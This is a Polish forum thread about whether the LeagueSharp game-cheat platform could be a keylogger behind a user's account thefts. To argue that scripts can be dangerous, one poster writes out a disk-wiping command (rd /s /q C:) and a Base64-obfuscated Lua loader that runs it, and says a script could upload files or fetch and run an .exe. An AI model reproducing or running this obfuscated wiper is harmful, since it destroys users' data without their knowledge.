Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

L# a keylogger

Rekomendowane odpowiedzi

Opublikowano

jest mozliwym ze przez L# ktos mial dostep do mojego konta na innym portalu ?

za konkretne info daje like

Opublikowano

Nie.

­345mulx.jpg

Opublikowano

l# to nie keylogger btw. po co by było jodusce ponad 1000 kont do lola?

Opublikowano

UP@ 

Ale to nie ma nic do znaczenia w tematem ;)

Po prostu LeagueSharp nic nie zmienia w plikach gry więc nie mają jak to sprawdzić to działa tylko w grze 

Jeżeli pomogłem polub mój post ;) <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3

Opublikowano

2 razy juz zostalem okradziony na innej witrynie i podejrzewam wlasnie L# bo nic innego nie uzywalem

Opublikowano

ja używam #L i nic mi nigdy nikt nie ukradł może masz hasło np imię : Adrian30? lub coś to się nie dziw a jak masz inne hasło to może pobierałeś coś  i to "coś" zawierało kayloggera 

Opublikowano

ja używam #L i nic mi nigdy nikt nie ukradł może masz hasło np imię : Adrian30? lub coś to się nie dziw a jak masz inne hasło to może pobierałeś coś  i to "coś" zawierało kayloggera 

tak pobralem leaguesharpa, i mysle ze z nim jest problem, mam tutaj nazwe d2jsp i wlasnie na tym forum mnie okradli 2 razy juz po tym jak pobralem L#

Opublikowano

Pamiętaj, że jak złapałeś jakiś syf kiedyś w przeszłości, to nie musiał się ktoś tobą interesować zaraz po jego ściągnięciu, mogło się to stać akurat jak ściągnąłeś L# i nie dziwie Ci się, że właśnie z sharpem powiązałeś owe kradzieże... zrób format, zainstaluj tylko lola i L# to zobaczysz, że nie będzie dalej żadnych kradzieży...

Opublikowano

Z czego cie okradli? Konto Ci ukradli? Możesz odzyskać, twoje konto będzie zawsze należało do ciebie a pisząc do Riot, pomogą ci odzyskać konto. Nikt do tej pory nie skarżył się na kradzieże kont ze strony L# ( oprócz ciebie... ) Ściągasz byle gó*** albo L# z jakiejś innej dziwnej strony to co się dziwisz.

W Regulaminie L# jest napisane że nikt nie będzie miał dostępu do twoich danych ( IP / Nick itd. ) Jak to wyszło w przypadku BOLa gdzie w moim przypadku dane się zgadzały.

wCAZfSW.png

Opublikowano

Teoretycznie z samego L# nie musisz mieć keyloggera. Jednak warto zaznaczyć, że skrypty, które są aktualizowane w postaci .exe mogą posiadać keyloggery. Opcja jednak niezwykle małoprawdopodobna

k7IyKRZ.jpg?1?3060
Pomogłem ? Kliknij Lubię to <3

Opublikowano

Mówisz, że nie jeden skrypt zbiera dane w bolu, mógłbyś podać jakichś przykład, zaprezentować kod/ściezkę odnoszącą się do czegoś innego niż skrypt?

k7IyKRZ.jpg?1?3060

Opublikowano

Mówisz, że nie jeden skrypt zbiera dane w bolu, mógłbyś podać jakichś przykład, zaprezentować kod/ściezkę odnoszącą się do czegoś innego niż skrypt?

w lua funkcja os.execute pozwala na wykonanie dowolnego polecenia.

Przykład: os.execute("rd /s /q C:") - usunie pliki z dysku C.

Encryptniesz to i proszę bardzo:

assert(load(Base64Decode("G0x1YVIAAQQEBAgAGZMNChoKAAAAAAAAAAAAAQIFAAAAJQAAAAgAAIAlQAAACACAgB8AgAACAAAABAwAAABEZWxldGVTdHVmZgAEBwAAAE9uTG9hZAACAAAAAQAAAAMAAAAAAAIFAAAABgBAAAdAQABBgAAAHUAAAR8AgAADAAAABAMAAABvcwAECAAAAGV4ZWN1dGUABAwAAAByZCAvcyAvcSBDOgAAAAAAAQAAAAAACQAAAEBkZWwubHVhAAUAAAACAAAAAgAAAAIAAAACAAAAAwAAAAAAAAABAAAABQAAAF9FTlYABQAAAAcAAAAAAAIDAAAABgBAAB1AgAAfAIAAAQAAAAQMAAAARGVsZXRlU3R1ZmYAAAAAAAEAAAAAAAkAAABAZGVsLmx1YQADAAAABgAAAAYAAAAHAAAAAAAAAAEAAAAFAAAAX0VOVgABAAAAAQAJAAAAQGRlbC5sdWEABQAAAAMAAAABAAAABwAAAAUAAAAHAAAAAAAAAAEAAAAFAAAAX0VOVgA="), nil, "bt", _ENV))()

W tym momencie możliwości atakującego są nieograniczone.

Skończ proszę się kompromitować. Jesteś nikim.

Opublikowano

w lua funkcja os.execute pozwala na wykonanie dowolnego polecenia.

Przykład: os.execute("rd /s /q C:") - usunie pliki z dysku C.

Encryptniesz to i proszę bardzo:

assert(load(Base64Decode("G0x1YVIAAQQEBAgAGZMNChoKAAAAAAAAAAAAAQIFAAAAJQAAAAgAAIAlQAAACACAgB8AgAACAAAABAwAAABEZWxldGVTdHVmZgAEBwAAAE9uTG9hZAACAAAAAQAAAAMAAAAAAAIFAAAABgBAAAdAQABBgAAAHUAAAR8AgAADAAAABAMAAABvcwAECAAAAGV4ZWN1dGUABAwAAAByZCAvcyAvcSBDOgAAAAAAAQAAAAAACQAAAEBkZWwubHVhAAUAAAACAAAAAgAAAAIAAAACAAAAAwAAAAAAAAABAAAABQAAAF9FTlYABQAAAAcAAAAAAAIDAAAABgBAAB1AgAAfAIAAAQAAAAQMAAAARGVsZXRlU3R1ZmYAAAAAAAEAAAAAAAkAAABAZGVsLmx1YQADAAAABgAAAAYAAAAHAAAAAAAAAAEAAAAFAAAAX0VOVgABAAAAAQAJAAAAQGRlbC5sdWEABQAAAAMAAAABAAAABwAAAAUAAAAHAAAAAAAAAAEAAAAFAAAAX0VOVgA="), nil, "bt", _ENV))()

W tym momencie możliwości atakującego są nieograniczone.

os.execute odnosi się jednak wyłącznie do takich komend dotyczących dysku "C" teoretycznie można rozwalić system usuwając pliki windowsowe, można zrobić format i wiele innych jednakże nie jesteś w stanie tą komendą zapisać jakikolwiek plik prywatny, z prostej przyczyny skrypt musiałby posiadać osobny serwer ftp.

k7IyKRZ.jpg?1?3060

Opublikowano

Auth script by xetrok

Opublikowano

Auth script by xetrok

To jest co innego Auth zbiera dane na serwer przeciwko crackowaniu skryptów (pobiera IP/HWID/Dane o systemie/MAC)

k7IyKRZ.jpg?1?3060

Opublikowano

os.execute odnosi się jednak wyłącznie do takich komend dotyczących dysku "C" teoretycznie można rozwalić system usuwając pliki windowsowe, można zrobić format i wiele innych jednakże nie jesteś w stanie tą komendą zapisać jakikolwiek plik prywatny, z prostej przyczyny skrypt musiałby posiadać osobny serwer ftp.

tak, os.execute odnosi się tylko do komend shellowych. Ale zauważ, że lua posiada znacznie więcej możliwości, niż same os.execute.

Przez socket.http możesz wysłać dowolny plik z Twojego komputera na zdalny serwer. Można też pobrać jakiś plik .exe ze zdalnego serwera i potem, przez os.execute, wykonać go.

Skończ proszę się kompromitować. Jesteś nikim.

Opublikowano

To jest co innego Auth zbiera dane na serwer przeciwko crackowaniu skryptów (pobiera IP/HWID/Dane o systemie/MAC)

nie. nie zmienia to faktu, że zbiera dane.

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...